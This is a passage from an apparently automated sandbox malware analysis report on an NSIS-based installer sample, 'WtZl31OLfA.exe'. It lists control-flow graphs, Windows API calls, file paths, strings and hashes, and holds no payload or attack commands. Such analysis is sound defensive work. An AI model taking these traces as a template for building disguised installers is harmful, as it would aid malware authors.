                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                • Instruction ID: 351587cf9ce3a522800e1c73501a9738d9f8821b35168cd3fdb078f4a7df3edc
                                                                                • Opcode Fuzzy Hash: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                • Instruction Fuzzy Hash: C2D012315081209BC34157787E0C84B7B5C9F1A3317259F36F96AF12E1CB348C2286DC
                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID:
                                                                                • API String ID: 1974802433-0
                                                                                • Opcode ID: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
                                                                                • Instruction ID: 34d4ac1ca0ba7345d9811ef03afe410f99a72e11e7e6ea98f315d3ade0c6d005
                                                                                • Opcode Fuzzy Hash: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
                                                                                • Instruction Fuzzy Hash: 32F08C71A012149BDB01EBA4DE49AAEB378FF45324F20457BE105F21E1E7B89A409B29

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 184 403c3c-403c4e 185 403c54-403c5a 184->185 186 403d8f-403d9e 184->186 185->186 187 403c60-403c69 185->187 188 403da0-403de8 GetDlgItem * 2 call 404114 SetClassLongW call 40140b 186->188 189 403ded-403e02 186->189 193 403c6b-403c78 SetWindowPos 187->193 194 403c7e-403c81 187->194 188->189 191 403e42-403e47 call 404160 189->191 192 403e04-403e07 189->192 206 403e4c-403e67 191->206 198 403e09-403e14 call 401389 192->198 199 403e3a-403e3c 192->199 193->194 195 403c83-403c95 ShowWindow 194->195 196 403c9b-403ca1 194->196 195->196 201 403ca3-403cb8 DestroyWindow 196->201 202 403cbd-403cc0 196->202 198->199 219 403e16-403e35 SendMessageW 198->219 199->191 205 4040e1 199->205 208 4040be-4040c4 201->208 210 403cc2-403cce SetWindowLongW 202->210 211 403cd3-403cd9 202->211 207 4040e3-4040ea 205->207 213 403e70-403e76 206->213 214 403e69-403e6b call 40140b 206->214 208->205 220 4040c6-4040cc 208->220 210->207 217 403d7c-403d8a call 40417b 211->217 218 403cdf-403cf0 GetDlgItem 211->218 215 403e7c-403e87 213->215 216 40409f-4040b8 DestroyWindow EndDialog 213->216 214->213 215->216 222 403e8d-403eda call 406072 call 404114 * 3 GetDlgItem 215->222 216->208 217->207 223 403cf2-403d09 SendMessageW IsWindowEnabled 218->223 224 403d0f-403d12 218->224 219->207 220->205 226 4040ce-4040d7 ShowWindow 220->226 254 403ee4-403f20 ShowWindow KiUserCallbackDispatcher call 404136 EnableWindow 222->254 255 403edc-403ee1 222->255 223->205 223->224 228 403d14-403d15 224->228 229 403d17-403d1a 224->229 226->205 232 403d45-403d4a call 4040ed 228->232 233 403d28-403d2d 229->233 234 403d1c-403d22 229->234 232->217 237 403d63-403d76 SendMessageW 233->237 239 403d2f-403d35 233->239 234->237 238 403d24-403d26 234->238 237->217 238->232 242 403d37-403d3d call 40140b 239->242 243 403d4c-403d55 call 40140b 239->243 250 403d43 242->250 243->217 252 403d57-403d61 243->252 250->232 252->250 258 403f22-403f23 254->258 259 403f25 254->259 255->254 260 403f27-403f55 GetSystemMenu EnableMenuItem SendMessageW 258->260 259->260 261 403f57-403f68 SendMessageW 260->261 262 403f6a 260->262 263 403f70-403fae call 404149 call 406050 lstrlenW call 406072 SetWindowTextW call 401389 261->263 262->263 263->206 272 403fb4-403fb6 263->272 272->206 273 403fbc-403fc0 272->273 274 403fc2-403fc8 273->274 275 403fdf-403ff3 DestroyWindow 273->275 274->205 276 403fce-403fd4 274->276 275->208 277 403ff9-404026 CreateDialogParamW 275->277 276->206 278 403fda 276->278 277->208 279 40402c-404083 call 404114 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 277->279 278->205 279->205 284 404085-404098 ShowWindow call 404160 279->284 286 40409d 284->286 286->208
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C78
                                                                                • ShowWindow.USER32(?), ref: 00403C95
                                                                                • DestroyWindow.USER32 ref: 00403CA9
                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CC5
                                                                                • GetDlgItem.USER32(?,?), ref: 00403CE6
                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFA
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403D01
                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403DAF
                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403DB9
                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD3
                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E24
                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403ECA
                                                                                • ShowWindow.USER32(00000000,?), ref: 00403EEB
                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EFD
                                                                                • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F2E
                                                                                • EnableMenuItem.USER32(00000000), ref: 00403F35
                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F4D
                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F60
                                                                                • lstrlenW.KERNEL32(0042D248,?,0042D248,Serrasalmo Setup), ref: 00403F89
                                                                                • SetWindowTextW.USER32(?,0042D248), ref: 00403F9D
                                                                                • ShowWindow.USER32(?,0000000A), ref: 004040D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                • String ID: Serrasalmo Setup
                                                                                • API String ID: 3282139019-3997006238
                                                                                • Opcode ID: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                                                • Instruction ID: 977002fee4e807fcea2a4689fe207fdbad8331f3a024ab3ce592dbd86d7f0908
                                                                                • Opcode Fuzzy Hash: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                                                • Instruction Fuzzy Hash: 2EC1D171504204BFDB216F61EE89E2B3A69FB88706F04053EF641B21F0CB799991DB6D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 287 403899-4038b1 call 40642a 290 4038b3-4038c3 call 405f97 287->290 291 4038c5-4038fc call 405f1d 287->291 300 40391f-403948 call 403b6f call 405b0c 290->300 296 403914-40391a lstrcatW 291->296 297 4038fe-40390f call 405f1d 291->297 296->300 297->296 305 4039da-4039e2 call 405b0c 300->305 306 40394e-403953 300->306 312 4039f0-403a15 LoadImageW 305->312 313 4039e4-4039eb call 406072 305->313 306->305 308 403959-403981 call 405f1d 306->308 308->305 314 403983-403987 308->314 316 403a96-403a9e call 40140b 312->316 317 403a17-403a47 RegisterClassW 312->317 313->312 318 403999-4039a5 lstrlenW 314->318 319 403989-403996 call 405a31 314->319 330 403aa0-403aa3 316->330 331 403aa8-403ab3 call 403b6f 316->331 320 403b65 317->320 321 403a4d-403a91 SystemParametersInfoW CreateWindowExW 317->321 325 4039a7-4039b5 lstrcmpiW 318->325 326 4039cd-4039d5 call 405a04 call 406050 318->326 319->318 324 403b67-403b6e 320->324 321->316 325->326 329 4039b7-4039c1 GetFileAttributesW 325->329 326->305 333 4039c3-4039c5 329->333 334 4039c7-4039c8 call 405a50 329->334 330->324 340 403ab9-403ad3 ShowWindow call 4063ba 331->340 341 403b3c-403b3d call 405282 331->341 333->326 333->334 334->326 346 403ad5-403ada call 4063ba 340->346 347 403adf-403af1 GetClassInfoW 340->347 345 403b42-403b44 341->345 348 403b46-403b4c 345->348 349 403b5e-403b60 call 40140b 345->349 346->347 352 403af3-403b03 GetClassInfoW RegisterClassW 347->352 353 403b09-403b2c DialogBoxParamW call 40140b 347->353 348->330 354 403b52-403b59 call 40140b 348->354 349->320 352->353 358 403b31-403b3a call 4037e9 353->358 354->330 358->324
                                                                                APIs
                                                                                  • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                  • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000000), ref: 0040391A
                                                                                • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\neoimpressionism,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,75923420), ref: 0040399A
                                                                                • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\neoimpressionism,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 004039AD
                                                                                • GetFileAttributesW.KERNEL32(: Completed), ref: 004039B8
                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\neoimpressionism), ref: 00403A01
                                                                                  • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
                                                                                • RegisterClassW.USER32(00433E80), ref: 00403A3E
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A56
                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A8B
                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403AC1
                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403AED
                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403AFA
                                                                                • RegisterClassW.USER32(00433E80), ref: 00403B03
                                                                                • DialogBoxParamW.USER32(?,00000000,00403C3C,00000000), ref: 00403B22
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\neoimpressionism$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                • API String ID: 1975747703-64885736
                                                                                • Opcode ID: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
                                                                                • Instruction ID: d3915a60f35156ec108069fee93d058ae2b4a83f87b830a45993cae0616e5fa0
                                                                                • Opcode Fuzzy Hash: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
                                                                                • Instruction Fuzzy Hash: EF61AA71640700AFD310AF659D46F2B3A6CEB84B4AF40113FF941B51E2DB7D6941CA2D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 361 402dee-402e3c GetTickCount GetModuleFileNameW call 405c25 364 402e48-402e76 call 406050 call 405a50 call 406050 GetFileSize 361->364 365 402e3e-402e43 361->365 373 402f63-402f71 call 402d8a 364->373 374 402e7c 364->374 366 403020-403024 365->366 381 402f73-402f76 373->381 382 402fc6-402fcb 373->382 376 402e81-402e98 374->376 378 402e9a 376->378 379 402e9c-402ea5 call 403242 376->379 378->379 386 402eab-402eb2 379->386 387 402fcd-402fd5 call 402d8a 379->387 384 402f78-402f90 call 403258 call 403242 381->384 385 402f9a-402fc4 GlobalAlloc call 403258 call 403027 381->385 382->366 384->382 407 402f92-402f98 384->407 385->382 412 402fd7-402fe8 385->412 391 402eb4-402ec8 call 405be0 386->391 392 402f2e-402f32 386->392 387->382 397 402f3c-402f42 391->397 410 402eca-402ed1 391->410 396 402f34-402f3b call 402d8a 392->396 392->397 396->397 403 402f51-402f5b 397->403 404 402f44-402f4e call 4064db 397->404 403->376 411 402f61 403->411 404->403 407->382 407->385 410->397 414 402ed3-402eda 410->414 411->373 415 402ff0-402ff5 412->415 416 402fea 412->416 414->397 418 402edc-402ee3 414->418 417 402ff6-402ffc 415->417 416->415 417->417 419 402ffe-403019 SetFilePointer call 405be0 417->419 418->397 420 402ee5-402eec 418->420 423 40301e 419->423 420->397 422 402eee-402f0e 420->422 422->382 424 402f14-402f18 422->424 423->366 425 402f20-402f28 424->425 426 402f1a-402f1e 424->426 425->397 427 402f2a-402f2c 425->427 426->411 426->425 427->397
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\WtZl31OLfA.exe,00000400,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00402E1B
                                                                                  • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\WtZl31OLfA.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405C29
                                                                                  • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405C4B
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WtZl31OLfA.exe,C:\Users\user\Desktop\WtZl31OLfA.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00402E67
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                • String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\WtZl31OLfA.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                • API String ID: 4283519449-3557474998
                                                                                • Opcode ID: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                • Instruction ID: ecf8b1e823d6f98de7c15f593086dd5554d056807b59ad61161c89ef3c81dadd
                                                                                • Opcode Fuzzy Hash: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                • Instruction Fuzzy Hash: AF51F671900216ABDB109F61DE89B9F7BB8FB54394F21413BF904B62C1C7B89D409B6C

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 554 401767-40178c call 402bbf call 405a7b 559 401796-4017a8 call 406050 call 405a04 lstrcatW 554->559 560 40178e-401794 call 406050 554->560 565 4017ad-4017ae call 4062e4 559->565 560->565 569 4017b3-4017b7 565->569 570 4017b9-4017c3 call 406393 569->570 571 4017ea-4017ed 569->571 579 4017d5-4017e7 570->579 580 4017c5-4017d3 CompareFileTime 570->580 572 4017f5-401811 call 405c25 571->572 573 4017ef-4017f0 call 405c00 571->573 581 401813-401816 572->581 582 401885-4018ae call 4051af call 403027 572->582 573->572 579->571 580->579 583 401867-401871 call 4051af 581->583 584 401818-401856 call 406050 * 2 call 406072 call 406050 call 405795 581->584 596 4018b0-4018b4 582->596 597 4018b6-4018c2 SetFileTime 582->597 594 40187a-401880 583->594 584->569 616 40185c-40185d 584->616 599 402a55 594->599 596->597 598 4018c8-4018d3 CloseHandle 596->598 597->598 601 4018d9-4018dc 598->601 602 402a4c-402a4f 598->602 604 402a57-402a5b 599->604 605 4018f1-4018f4 call 406072 601->605 606 4018de-4018ef call 406072 lstrcatW 601->606 602->599 612 4018f9-40228d call 405795 605->612 606->612 612->602 612->604 616->594 618 40185f-401860 616->618 618->583
                                                                                APIs
                                                                                • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\neoimpressionism\Vekselformular,?,?,00000031), ref: 004017A8
                                                                                • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\neoimpressionism\Vekselformular,?,?,00000031), ref: 004017CD
                                                                                  • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Serrasalmo Setup,NSIS Error), ref: 0040605D
                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                  • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,759223A0), ref: 0040520A
                                                                                  • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll$C:\Users\user\AppData\Local\neoimpressionism\Vekselformular$ExecToStack
                                                                                • API String ID: 1941528284-2374460273
                                                                                • Opcode ID: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
                                                                                • Instruction ID: fa226e2697354f8a36450ecb7523776f7f82d9f29d3b914395726c71c929f9d2
                                                                                • Opcode Fuzzy Hash: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
                                                                                • Instruction Fuzzy Hash: 37418471900514BADF11BBB5CC46EAF7679EF45328F20823BF522B10E1DB3C8A519A6D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 620 4051af-4051c4 621 4051ca-4051db 620->621 622 40527b-40527f 620->622 623 4051e6-4051f2 lstrlenW 621->623 624 4051dd-4051e1 call 406072 621->624 626 4051f4-405204 lstrlenW 623->626 627 40520f-405213 623->627 624->623 626->622 628 405206-40520a lstrcatW 626->628 629 405222-405226 627->629 630 405215-40521c SetWindowTextW 627->630 628->627 631 405228-40526a SendMessageW * 3 629->631 632 40526c-40526e 629->632 630->629 631->632 632->622 633 405270-405273 632->633 633->622
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                • lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                • lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,759223A0), ref: 0040520A
                                                                                • SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                • String ID: Completed
                                                                                • API String ID: 2531174081-3087654605
                                                                                • Opcode ID: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
                                                                                • Instruction ID: 3abc69651b1b947d68a29ef5f67bb3ab151c750651a003a3f474b57aa403b91e
